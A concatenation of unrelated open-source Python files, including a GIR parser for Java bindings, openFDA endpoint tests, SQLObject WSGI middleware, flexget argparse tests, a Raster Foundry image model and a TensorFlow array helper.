self.instance_param = instance_param
if return_value is None:
return_value = VoidType()
self.return_value = return_value
self.params = params
if instance_param is not None:
self.all_params = [instance_param] + params
else:
self.all_params = params
def is_closure_param(param):
return isinstance(param, JObjectWrapperType)
self.closure_params, self.java_params = partition(is_closure_param, params)
def is_length_param(param):
return param.is_length_param
self.length_params, self.java_params = partition(is_length_param, self.java_params)
if java_params:
self.java_params = java_params
def set_parent(param):
if param is not None:
param.parent = self
map(set_parent, [return_value, instance_param] + params)
def __iter__(self):
return iter(self.all_params)
@classmethod
def from_tag(cls, type_registry, tag):
return_value = parse_tag_value(type_registry, tag.find(TAG_RETURN_VALUE), 'result')
params_tag = tag.find(TAG_PARAMETERS)
if params_tag is None:
return cls(return_value, None)
closure_refs = {}
destroy_refs = {}
array_refs = {}
for tag_index, tag in enumerate(params_tag.findall(TAG_PARAMETER)):
closure = tag.get(ATTR_CLOSURE)
if closure is not None:
closure_refs[int(closure)] = tag_index
destroy = tag.get(ATTR_DESTORY)
if destroy is not None:
destroy_refs[int(destroy)] = tag_index
array_tag = tag.find(TAG_ARRAY)
if array_tag is not None:
length = array_tag.get(ATTR_LENGTH)
if length is not None:
array_refs[int(length)] = tag_index
params = []
instance_param = None
real_tag_index = 0
for tag in params_tag:
if tag.tag == TAG_INSTANCE_PARAMETER:
assert real_tag_index == 0
instance_param = parse_tag_value(type_registry, tag)
else:
if closure_refs.get(real_tag_index) is not None:
name = tag.get(ATTR_NAME)
closure_index = closure_refs.get(real_tag_index)
closure = None
if closure_index == real_tag_index - 1:
closure = params[-1]
else:
assert closure_index == real_tag_index
params.append(JObjectWrapperType(name, closure, transfer_ownership=True))
elif destroy_refs.get(real_tag_index) is not None:
name = tag.get(ATTR_NAME)
destroy_index = destroy_refs.get(real_tag_index)
assert destroy_index == real_tag_index - 2
params[-2].scope == 'notified'
params.append(JDestroyType(name))
elif array_refs.get(real_tag_index) is not None:
array_index = array_refs.get(real_tag_index)
assert array_index == real_tag_index - 1
array = params[-1]
value = parse_tag_value(type_registry, tag)
value.is_length_param = True
value.array = array
array.length = value
params.append(value)
else:
params.append(parse_tag_value(type_registry, tag))
real_tag_index += 1
return cls(return_value, instance_param, params)
@printable
class Property(object):
def __init__(self, name, value, class_value, readable, writable, construct_only):
self.name = name
self.value = value
self.readable = readable
self.writable = writable
self.construct_only = construct_only
if readable:
get_value = copy(value)
get_value.transfer_ownership = not get_value.transfer_ownership
self.getter = Method(
c_name=None,
name='get' + title_case(name),
params=Parameters(get_value, class_value),
)
self.signal = Signal(
name='on' + title_case(name) + 'Changed',
params=Parameters(None, class_value, [
GParamSpecType('pspec', transfer_ownership=False),
JObjectWrapperType('listener', None, transfer_ownership=False),
], java_params=[value]),
signal_name='notify::' + name,
interface_name=title_case(name) + 'ChangeListener',
class_value=class_value,
when='first',
)
if writable:
self.setter = Method(
c_name=None,
name='set' + title_case(name),
params=Parameters(None, class_value, [value]),
)
@classmethod
def from_tag(cls, type_registry, class_value, tag):
name = tag.get(ATTR_NAME)
return cls(
name=name,
value=parse_tag_value(type_registry, tag, camel_case(name)),
class_value=class_value,
readable=str(tag.get(ATTR_READABLE)) != '0',
writable=str(tag.get(ATTR_WRITABLE)) == '1' and str(tag.get(ATTR_CONSTRUCT_ONLY)) != '1',
construct_only=bool(tag.get(ATTR_CONSTRUCT_ONLY)),
)
@printable
class BaseFunction(object):
def __init__(self, name, params, c_name=None, doc=None):
self.name = name
self.c_name = c_name
self.params = params
self.doc = doc
@property
def method_signature(self):
arg_signature = ''.join((p.java_signature for p in self.params.java_params if p.java_signature is not None))
return '(' + arg_signature + ')' + self.params.return_value.java_signature
@classmethod
def from_tag(cls, type_registry, tag):
return cls(
doc=parse_doc(tag),
name=camel_case(tag.get(ATTR_NAME)),
c_name=tag.get(ATTR_C_IDENTIFIER),
params=Parameters.from_tag(type_registry, tag),
)
class Function(BaseFunction):
pass
class Method(BaseFunction):
pass
class Constructor(BaseFunction):
def __init__(self, **kwargs):
super(Constructor, self).__init__(**kwargs)
p = self.params
self.params = Parameters(GWeakRefType('instance_pointer'), p.instance_param, p.params)
self.name = 'nativeConstructor'
class Callback(BaseFunction):
def __init__(self, value, **kwargs):
super(Callback, self).__init__(**kwargs)
self.value = value
@classmethod
def from_tag(cls, type_registry, tag):
callback_name = tag.get(ATTR_NAME)
callback_value = type_registry.lookup(callback_name, None)('listener', False)
return cls(
doc=parse_doc(tag),
name='on' + callback_name,
value=callback_value,
params=Parameters.from_tag(type_registry, tag),
)
class Signal(BaseFunction):
def __init__(self, signal_name, interface_name, class_value, when, **kwargs):
BaseFunction.__init__(self, **kwargs)
self.signal_name = signal_name
self.when = when
listener_value = ClassCallbackMetaType(
java_type=interface_name,
outer=class_value,
)('listener')
handle_value = IntType('handle', transfer_ownership=False)
closure_value = JObjectWrapperType('user_data', listener_value, transfer_ownership=False)
self.add_listener = Method(
c_name=None,
name='connect' + listener_value.java_type,
params=Parameters(handle_value, class_value, [listener_value, closure_value]),
)
self.remove_listener = Method(
c_name=None,
name='disconnect' + listener_value.java_type,
params=Parameters(None, class_value, [handle_value]),
)
self.public_add_listener = Method(
c_name=None,
name='add' + listener_value.java_type,
params=Parameters(None, None, [listener_value]),
)
self.public_remove_listener = Method(
c_name=None,
name='remove' + listener_value.java_type,
params=Parameters(None, None, [listener_value]),
)
self.value = listener_value
@classmethod
def from_tag(cls, type_registry, class_value, tag):
signal_name = tag.get(ATTR_NAME)
parsed_params = Parameters.from_tag(type_registry, tag)
return_value = parsed_params.return_value
params = parsed_params.all_params if parsed_params is not None else []
params = [return_value, class_value] + [params + [JObjectWrapperType('listener', None, transfer_ownership=False)]]
return cls(
name=camel_case(signal_name),
signal_name=signal_name,
interface_name=title_case(signal_name) + 'Listener',
class_value=class_value,
when=tag.get(ATTR_WHEN),
params=Parameters(*params),
)
@printable
class Class(object):
def __init__(self, **kwargs):
self.__dict__.update(**kwargs)
@classmethod
def from_tag(cls, type_registry, tag, interfaces=None):
parent = tag.get(ATTR_PARENT)
if parent == 'GObject.Object':
parent = None
name = tag.get(ATTR_NAME)
value = type_registry.lookup(name, None)('self')
return cls(
name=name,
parent=parent,
c_type=tag.get(ATTR_C_TYPE),
value=value,
c_symbol_prefix=tag.get(ATTR_C_SYMBOL_PREFIX),
glib_type_name=tag.get(ATTR_GLIB_TYPE_NAME),
glib_get_type=tag.get(ATTR_GLIB_GET_TYPE),
glib_type_struct=tag.get(ATTR_GLIB_TYPE_STRUCT),
constructors=[Constructor.from_tag(type_registry, t) for t in tag.findall(TAG_CONSTRUCTOR) if t.get(ATTR_INTROSPECTABLE) != '0'],
properties=[Property.from_tag(type_registry, value, t) for t in tag.findall(TAG_PROPERTY) if t.get(ATTR_INTROSPECTABLE) != '0'],
methods=[Method.from_tag(type_registry, t) for t in tag.findall(TAG_METHOD) if t.get(ATTR_INTROSPECTABLE) != '0'],
functions=[Function.from_tag(type_registry, t) for t in tag.findall(TAG_FUNCTION) if t.get(ATTR_INTROSPECTABLE) != '0'],
signals=[Signal.from_tag(type_registry, value, t) for t in tag.findall(TAG_SIGNAL) if t.get(ATTR_INTROSPECTABLE) != '0'],
interfaces=[interfaces[t.get(ATTR_NAME)] for t in tag.findall(TAG_IMPLEMENTS)],
)
@printable
class EnumMember(object):
def __init__(self, value, name, c_name, nick=None, description=None):
self.value = value
self.name = name
self.c_name = c_name
self.nick = nick
self.description = description
@classmethod
def from_tag(cls, tag, glib_tag=None):
value = tag.get(ATTR_VALUE)
if glib_tag is not None:
assert value == glib_tag.get(ATTR_VALUE)
return cls(
value=value,
name=tag.get(ATTR_NAME).upper(),
c_name=tag.get(ATTR_C_IDENTIFIER),
nick=glib_tag.get(ATTR_GLIB_NICK),
description=glib_tag.get(ATTR_C_IDENTIFIER),
)
else:
return cls(
value=value,
name=tag.get(ATTR_NAME).upper(),
c_name=tag.get(ATTR_C_IDENTIFIER),
)
@printable
class Enum(object):
def __init__(self, name, c_name, type, is_bitfield, members, has_nick=False, has_description=False):
self.name = name
self.c_name = c_name
self.type = type
self.is_bitfield = is_bitfield
self.members = members
self.has_nick = has_nick
self.has_description = has_description
@classmethod
def from_tag(cls, type_registry, tag, glib_tag=None):
members = tag.findall(TAG_MEMBER)
name = tag.get(ATTR_NAME)
c_name = tag.get(ATTR_C_TYPE)
type = type_registry.lookup(name, c_name)
if glib_tag is not None:
glib_members = glib_tag.findall(TAG_MEMBER)
return cls(
name=name,
c_name=c_name,
type=type,
is_bitfield=tag.tag == TAG_BITFIELD,
members=[EnumMember.from_tag(*tags) for tags in zip(members, glib_members)],
has_nick=True,
has_description=True,
)
else:
return cls(
name=name,
c_name=c_name,
type=type,
is_bitfield=tag.tag == TAG_BITFIELD,
members=[EnumMember.from_tag(tag) for tag in members],
)
@printable
class Namespace(object):
def __init__(self, type_registry, tag):
def find_enum_pairs():
enum_tags = tag.findall(TAG_ENUMERATION) + tag.findall(TAG_BITFIELD)
c_enums, glib_enums = partition(lambda top: top.get(ATTR_GLIB_TYPE_NAME) is None, enum_tags)
glib_enum_dict = {enum.get(ATTR_NAME): enum for enum in glib_enums}
def glib_from_c(c_enum):
glib_enum = glib_enum_dict.get(c_enum.get(ATTR_NAME) + 's')
if glib_enum is not None:
return [c_enum, glib_enum]
else:
return [c_enum]
return map(glib_from_c, c_enums)
interfaces = [Class.from_tag(type_registry, t) for t in tag.findall(TAG_INTERFACE)]
interface_map = {interface.name: interface for interface in interfaces}
self.name = tag.get(ATTR_NAME)
self.symbol_prefix = tag.get(ATTR_C_SYMBOL_PREFIXES)
self.identifier_prefix = tag.get(ATTR_C_IDENTIFIER_PREFIXES)
self.shared_library = tag.get(ATTR_SHARED_LIBRARY)
self.interfaces = interfaces
self.enums = [Enum.from_tag(type_registry, *tags) for tags in find_enum_pairs()]
self.callbacks = [Callback.from_tag(type_registry, t) for t in tag.findall(TAG_CALLBACK)]
self.classes = [Class.from_tag(type_registry, t, interface_map) for t in tag.findall(TAG_CLASS)]
self.functions = [Function.from_tag(type_registry, t) for t in tag.findall(TAG_FUNCTION)]
class GirParser(object):
def __init__(self, xml_root):
self.xml_root = xml_root
def parse_types(self):
types = []
for namespace in self.xml_root.findall(TAG_NAMESPACE):
prefix = namespace.get(ATTR_C_SYMBOL_PREFIXES)
tag_types = {
TAG_CLASS: GObjectMetaType,
TAG_INTERFACE: GObjectMetaType,
TAG_CALLBACK: CallbackMetaType,
TAG_ENUMERATION: EnumMetaType,
TAG_BITFIELD: BitfieldMetaType,
}
tags = sum(map(namespace.findall, tag_types.keys()), [])
for tag in tags:
gir_type = tag.get(ATTR_NAME)
c_type = tag.get(ATTR_C_TYPE)
MetaType = tag_types[tag.tag]
if MetaType == EnumMetaType or MetaType == BitfieldMetaType:
if tag.get(ATTR_GLIB_TYPE_NAME) is not None:
continue
types.append(MetaType(
gir_type=gir_type,
c_type=c_type,
prefix=prefix,
))
return types
def parse_enum_aliases(self):
aliases = {}
for namespace in self.xml_root.findall(TAG_NAMESPACE):
enum_tags = namespace.findall(TAG_ENUMERATION) + namespace.findall(TAG_BITFIELD)
for tag in enum_tags:
if tag.get(ATTR_GLIB_TYPE_NAME) is not None:
alias = tag.get(ATTR_NAME)
name = alias[:-1]
aliases[alias] = name
return aliases
def parse_full(self, type_registry):
return [Namespace(type_registry, tag) for tag in self.xml_root.findall(TAG_NAMESPACE)]
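# A minimal, hedged usage sketch of the parser above. It assumes the
# type-registry object defined earlier in this module accepts the parsed
# meta-types and exposes the lookup() used throughout this file; the name
# 'TypeRegistry' and the .gir filename are illustrative assumptions only.
#
# import xml.etree.ElementTree as ET
#
# root = ET.parse('MyLib-1.0.gir').getroot()            # hypothetical GIR file
# parser = GirParser(root)
# registry = TypeRegistry(parser.parse_types(),         # hypothetical registry API
#                         parser.parse_enum_aliases())
# for namespace in parser.parse_full(registry):
#     print(namespace.name, [c.name for c in namespace.classes])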
|
openfda/deploy/tests/foodevent/test_endpoint.py | hobochili/openfda | 388 | 12698388 | from openfda.tests.api_test_helpers import *
from nose.tools import *
def test_consumer_merge():
meta, results = fetch(
'/food/event.json?search=report_number:65420')
eq_(len(results), 1)
event = results[0]
eq_(event["consumer"]["gender"], "M")
eq_(event["consumer"]["age"], "33")
eq_(event["consumer"]["age_unit"], "year(s)")
def test_consumer_merge_with_missing_data():
meta, results = fetch(
'/food/event.json?search=report_number:65619')
eq_(len(results), 1)
event = results[0]
eq_(event["consumer"]["gender"], "M")
eq_(event["consumer"]["age"], "70")
eq_(event["consumer"]["age_unit"], "year(s)")
def test_full_record():
meta, results = fetch(
'/food/event.json?search=report_number:65619')
eq_(len(results), 1)
event = results[0]
eq_(event["date_created"], "20040112")
eq_(event["date_started"], "20031222")
eq_(event["outcomes"], ["Disability"])
products = sorted(event["products"], key=lambda k: k['name_brand'])
eq_(len(products), 5)
eq_(products[0]["industry_code"], "54")
eq_(products[0]["industry_name"], "Vit/Min/Prot/Unconv Diet(Human/Animal)")
eq_(products[0]["name_brand"], "ACEYTL-L-CARNITINE")
eq_(products[0]["role"], "SUSPECT")
eq_(products[1]["industry_code"], "54")
eq_(products[1]["industry_name"], "Vit/Min/Prot/Unconv Diet(Human/Animal)")
eq_(products[1]["name_brand"], "ALPHA LIPOIC")
eq_(products[1]["role"], "SUSPECT")
eq_(products[2]["industry_code"], "54")
eq_(products[2]["industry_name"], "Vit/Min/Prot/Unconv Diet(Human/Animal)")
eq_(products[2]["name_brand"], "CALCIUM CALTRATE")
eq_(products[2]["role"], "SUSPECT")
eq_(products[3]["industry_code"], "54")
eq_(products[3]["industry_name"], "Vit/Min/Prot/Unconv Diet(Human/Animal)")
eq_(products[3]["name_brand"], "MULTIVITAMIN")
eq_(products[3]["role"], "SUSPECT")
eq_(products[4]["industry_code"], "54")
eq_(products[4]["industry_name"], "Vit/Min/Prot/Unconv Diet(Human/Animal)")
eq_(products[4]["name_brand"], "VITAMIN E")
eq_(products[4]["role"], "SUSPECT")
eq_(sorted(event["reactions"], key=lambda k: k),
[u'ASTHENIA', u'DEPRESSED MOOD', u'DIZZINESS', u'IMPAIRED DRIVING ABILITY', u'LETHARGY', u'PHYSICAL EXAMINATION'])
eq_(event["report_number"], "65619")
eq_(event["consumer"]["gender"], "M")
eq_(event["consumer"]["age"], "70")
eq_(event["consumer"]["age_unit"], "year(s)")
def test_sort_by_date_created():
meta, results = fetch(
'/food/event.json?search=date_created:[20170220+TO+20170225]+AND+reactions:OVARIAN+CANCER&sort=date_created:asc')
eq_(len(results), 1)
event = results[0]
eq_(event["date_created"], "20170221")
meta, results = fetch(
'/food/event.json?search=date_created:[20170220+TO+20170225]+AND+reactions:OVARIAN+CANCER&sort=date_created:desc')
eq_(len(results), 1)
event = results[0]
eq_(event["date_created"], "20170224")
|
libs/sqlobject/wsgi_middleware.py | scambra/HTPC-Manager | 422 | 12698389 | from paste.deploy.converters import asbool
from paste.wsgilib import catch_errors
from paste.util import import_string
import sqlobject
import threading
def make_middleware(app, global_conf, database=None, use_transaction=False,
hub=None):
"""
WSGI middleware that sets the connection for the request (using
the database URI or connection object) and the given hub (or
``sqlobject.sqlhub`` if not given).
If ``use_transaction`` is true, then the request will be run in a
transaction.
Applications can use the keys (which are all no-argument functions):
``sqlobject.get_connection()``:
Returns the connection object
``sqlobject.abort()``:
Aborts the transaction. Does not raise an error, but at the *end*
of the request there will be a rollback.
``sqlobject.begin()``:
Starts a transaction. First commits (or rolls back if aborted) if
this is run in a transaction.
``sqlobject.in_transaction()``:
Returns true or false, depending if we are currently in a
transaction.
"""
use_transaction = asbool(use_transaction)
if database is None:
database = global_conf.get('database')
if not database:
raise ValueError(
"You must provide a 'database' configuration value")
if isinstance(hub, basestring):
hub = import_string.eval_import(hub)
if not hub:
hub = sqlobject.sqlhub
if isinstance(database, basestring):
database = sqlobject.connectionForURI(database)
return SQLObjectMiddleware(app, database, use_transaction, hub)
class SQLObjectMiddleware(object):
def __init__(self, app, conn, use_transaction, hub):
self.app = app
self.conn = conn
self.use_transaction = use_transaction
self.hub = hub
def __call__(self, environ, start_response):
conn = [self.conn]
if self.use_transaction:
conn[0] = conn[0].transaction()
any_errors = []
use_transaction = [self.use_transaction]
self.hub.threadConnection = conn[0]
def abort():
assert use_transaction[0], (
"You cannot abort, because a transaction is not being used")
any_errors.append(None)
def begin():
if use_transaction[0]:
if any_errors:
conn[0].rollback()
else:
conn[0].commit()
any_errors[:] = []
use_transaction[0] = True
conn[0] = self.conn.transaction()
self.hub.threadConnection = conn[0]
def error(exc_info=None):
any_errors.append(None)
ok()
def ok():
if use_transaction[0]:
if any_errors:
conn[0].rollback()
else:
conn[0].commit(close=True)
self.hub.threadConnection = None
def in_transaction():
return use_transaction[0]
def get_connection():
return conn[0]
environ['sqlobject.get_connection'] = get_connection
environ['sqlobject.abort'] = abort
environ['sqlobject.begin'] = begin
environ['sqlobject.in_transaction'] = in_transaction
return catch_errors(self.app, environ, start_response,
error_callback=error, ok_callback=ok)
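# A minimal, hedged usage sketch of the environ keys set by this middleware.
# 'MyTable' and demo_app are hypothetical and the database URI is a
# placeholder; only make_middleware and the 'sqlobject.*' keys come from
# this module.
#
# def demo_app(environ, start_response):
#     conn = environ['sqlobject.get_connection']()
#     rows = MyTable.select(connection=conn)           # hypothetical SQLObject class
#     if environ['sqlobject.in_transaction']() and rows.count() == 0:
#         environ['sqlobject.abort']()                 # rolled back at end of request
#     start_response('200 OK', [('Content-Type', 'text/plain')])
#     return [str(rows.count())]
#
# wrapped = make_middleware(demo_app, {}, database='sqlite:///tmp/demo.db',
#                           use_transaction=True)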
|
sample/sample_get_sqlite_master.py | thombashi/SimpleSQLite | 126 | 12698409 | #!/usr/bin/env python3
import json
from simplesqlite import SimpleSQLite
def main():
con = SimpleSQLite("sample.sqlite", "w")
data_matrix = [[1, 1.1, "aaa", 1, 1], [2, 2.2, "bbb", 2.2, 2.2], [3, 3.3, "ccc", 3, "ccc"]]
con.create_table_from_data_matrix(
"sample_table", ["a", "b", "c", "d", "e"], data_matrix, index_attrs=["a"]
)
print(json.dumps(con.fetch_sqlite_master(), indent=4))
if __name__ == "__main__":
main()
|
common/pickleserializable.py | cganta/dbtest | 130 | 12698426 | """
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
"""
from abc import abstractmethod, ABCMeta
class PickleSerializable():
__metaclass__ = ABCMeta
@abstractmethod
def serialize(self):
pass
@abstractmethod
def deserialize(self):
pass
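# A minimal, hedged sketch of a concrete subclass; it assumes pickle
# round-tripping is the intended contract, which the interface does not state.
# Note that under Python 3 the __metaclass__ attribute above is ignored, so the
# abstract methods are only enforced when this module runs under Python 2.
#
# import pickle
#
# class PickledDict(PickleSerializable):
#     def __init__(self, data=None):
#         self.data = data or {}
#         self._blob = None
#
#     def serialize(self):
#         self._blob = pickle.dumps(self.data)
#         return self._blob
#
#     def deserialize(self):
#         self.data = pickle.loads(self._blob)
#         return self.data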
|
ml3d/datasets/augment/__init__.py | kylevedder/Open3D-ML | 447 | 12698434 | from .augmentation import SemsegAugmentation, ObjdetAugmentation
|
test/utils/test_rounding.py | SamuelMarks/botorch | 2,344 | 12698437 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
from botorch.utils.rounding import approximate_round
from botorch.utils.testing import BotorchTestCase
class TestApproximateRound(BotorchTestCase):
def test_approximate_round(self):
for dtype in (torch.float, torch.double):
X = torch.linspace(-2.5, 2.5, 11, device=self.device, dtype=dtype)
exact_rounded_X = X.round()
approx_rounded_X = approximate_round(X)
# check that approximate rounding is closer to rounded values than
# the original inputs
rounded_diffs = (approx_rounded_X - exact_rounded_X).abs()
diffs = (X - exact_rounded_X).abs()
self.assertTrue((rounded_diffs <= diffs).all())
# check that not all gradients are zero
X.requires_grad_(True)
approximate_round(X).sum().backward()
self.assertTrue((X.grad.abs() != 0).any())
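# A minimal, hedged standalone sketch of the property exercised by this test;
# the tensor values below are illustrative only.
#
# import torch
# from botorch.utils.rounding import approximate_round
#
# x = torch.linspace(-2.0, 2.0, 9, requires_grad=True)
# y = approximate_round(x)    # stays close to x.round() but remains differentiable
# y.sum().backward()
# print(x.grad)               # not all zeros, unlike the gradient of torch.round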
|
flexget/tests/test_argparse.py | Jeremiad/Flexget | 1,322 | 12698471 | from argparse import Action
from flexget.options import ArgumentParser
def test_subparser_nested_namespace():
p = ArgumentParser()
p.add_argument('--outer')
p.add_subparsers(nested_namespaces=True)
sub = p.add_subparser('sub')
sub.add_argument('--inner')
sub.add_subparsers()
subsub = sub.add_subparser('subsub')
subsub.add_argument('--innerinner')
result = p.parse_args(['--outer', 'a', 'sub', '--inner', 'b', 'subsub', '--innerinner', 'c'])
assert result.outer == 'a'
# First subparser values should be nested under subparser name
assert result.sub.inner == 'b'
assert not hasattr(result, 'inner')
# The second layer did not define nested_namespaces, results should be in first subparser namespace
assert result.sub.innerinner == 'c'
assert not hasattr(result, 'innerinner')
def test_subparser_parent_defaults():
p = ArgumentParser()
p.add_argument('--a')
p.set_post_defaults(a='default')
p.add_subparsers()
p.add_subparser('sub')
p.add_subparser('sub_with_default', parent_defaults={'a': 'sub_default'})
# Make sure normal default works
result = p.parse_args(['sub'])
assert result.a == 'default'
# Test subparser default
result = p.parse_args(['sub_with_default'])
assert result.a == 'sub_default'
# Subparser default should not override explicit one
result = p.parse_args(['--a', 'manual', 'sub_with_default'])
assert result.a == 'manual'
def test_post_defaults():
class CustomAction(Action):
def __call__(self, parser, namespace, values, option_string=None):
if not hasattr(namespace, 'post_set'):
namespace.post_set = 'custom'
p = ArgumentParser()
p.add_argument('--post-set')
p.add_argument('--custom', action=CustomAction, nargs=0)
p.set_post_defaults(post_set='default')
# Explicitly specified, no defaults should be set
result = p.parse_args(['--post-set', 'manual'])
assert result.post_set == 'manual'
# Nothing supplied, should get the post set default
result = p.parse_args([])
assert result.post_set == 'default'
# Custom action should be allowed to set default
result = p.parse_args(['--custom'])
assert result.post_set == 'custom'
|
app-tasks/rf/src/rf/models/image.py | pomadchin/raster-foundry | 112 | 12698472 | """Python class representation of a Raster Foundry Image"""
from .base import BaseModel
from .band import Band
class Image(BaseModel):
URL_PATH = "/api/images/"
def __init__(
self,
rawDataBytes,
visibility,
filename,
sourceuri,
bands,
imageMetadata,
resolutionMeters,
metadataFiles,
scene=None,
owner=None,
):
"""Create a new Image
Args:
rawDataBytes (int): size of image
visibility (str): accessibility level for object
filename (str): filename for image (displayed to users)
sourceuri (str): source of image
bands (List[Band]): list of bands in image
imageMetadata (dict): extra information about the image
resolutionMeters (float): resolution of image
metadataFiles (list): metadata files associated with the image
scene (str): optional id of the scene this image belongs to
owner (str): optional owner of image
"""
self.rawDataBytes = rawDataBytes
self.visibility = visibility
self.filename = filename
self.sourceUri = sourceuri
self.scene = scene
self.imageMetadata = imageMetadata
self.resolutionMeters = resolutionMeters
self.metadataFiles = metadataFiles
self.bands = bands
self.owner = owner
def __repr__(self):
return "<Image: {}>".format(self.filename)
@classmethod
def from_dict(cls, d):
bands = [Band.from_dict(band) for band in d.get("bands")]
return cls(
d.get("rawDataBytes"),
d.get("visibility"),
d.get("filename"),
d.get("sourceUri"),
bands,
d.get("imageMetadata"),
d.get("resolutionMeters"),
d.get("metadataFiles"),
d.get("scene"),
d.get("owner"),
)
def to_dict(self):
image_dict = dict(
rawDataBytes=self.rawDataBytes,
visibility=self.visibility,
filename=self.filename,
sourceUri=self.sourceUri,
bands=[band.to_dict() for band in self.bands],
imageMetadata=self.imageMetadata,
metadataFiles=self.metadataFiles,
resolutionMeters=self.resolutionMeters,
owner=self.owner,
)
if self.scene:
image_dict["scene"] = self.scene
return image_dict
def create(self):
assert self.scene, "Scene is required to create an Image"
return super(Image, self).create()
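# A minimal, hedged construction sketch; every field value below is a
# placeholder, and real usage would pass Band instances built from actual
# band metadata rather than an empty list.
#
# img = Image(
#     rawDataBytes=1024,
#     visibility='PRIVATE',
#     filename='tile.tif',
#     sourceuri='s3://bucket/tile.tif',
#     bands=[],
#     imageMetadata={},
#     resolutionMeters=30.0,
#     metadataFiles=[],
#     scene='scene-uuid',      # required before calling create()
# )
# payload = img.to_dict()      # dict presumably posted to URL_PATH by BaseModel.create()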
|
research/carls/util/array_ops.py | srihari-humbarwadi/neural-structured-learning | 939 | 12698473 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Array related ops."""
import tensorflow as tf
def increment_last_dim(input_tensor: tf.Tensor,
default_value: float) -> tf.Tensor:
"""Grows the size of last dimension of given `input_tensor` by one.
Examples:
- [[1, 2], [3, 4]] -> [[1, 2, 1], [3, 4, 1]] (default_value = 1).
- [1, 2, 3] -> [1, 2, 3, 4] (default_value = 4).
Args:
input_tensor: a float tf.Tensor whose last dimension is to be incremented.
default_value: a float value denoting the default value for the increased
part.
Returns:
A new `tf.Tensor` with increased last dimension size.
"""
input_tensor = tf.dtypes.cast(input_tensor, tf.float32)
inc_tensor = tf.ones(tf.shape(input_tensor)[:-1])
inc_tensor = tf.expand_dims(inc_tensor, -1) * default_value
return tf.concat([input_tensor, inc_tensor], axis=-1)
|